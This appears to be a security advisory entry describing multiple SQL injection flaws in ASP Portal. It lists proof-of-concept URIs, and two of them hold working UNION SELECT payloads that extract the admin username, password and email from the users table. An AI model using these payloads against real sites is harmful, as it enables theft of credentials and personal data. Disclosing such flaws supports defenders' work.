|
ASP Portal Multiple SQL Injection Vulnerabilities
This issue can be exploited via a web client. The following proof of concept URI are available: http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=[SQLCode] http://www.example.com/apdir/content/news/News_Item.asp?content_ID=[SQLCode] http://www.example.com/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='admin' http://www.example.com/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0,group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin' http://www.example.com/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQLCode] http://www.example.com/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQLCode] http://www.example.com/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQLCode] http://www.example.com/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQLCode] http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQLCode] http://www.example.com/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQLCode] http://www.example.com/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQLCode]&pageid=2 http://www.example.com/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no=1 http://www.example.com/apdir/content/downloads/add_edit_download.asp?page_type=1 An exploit is available for the download_click.asp issue: |
|
|
Privacy Statement |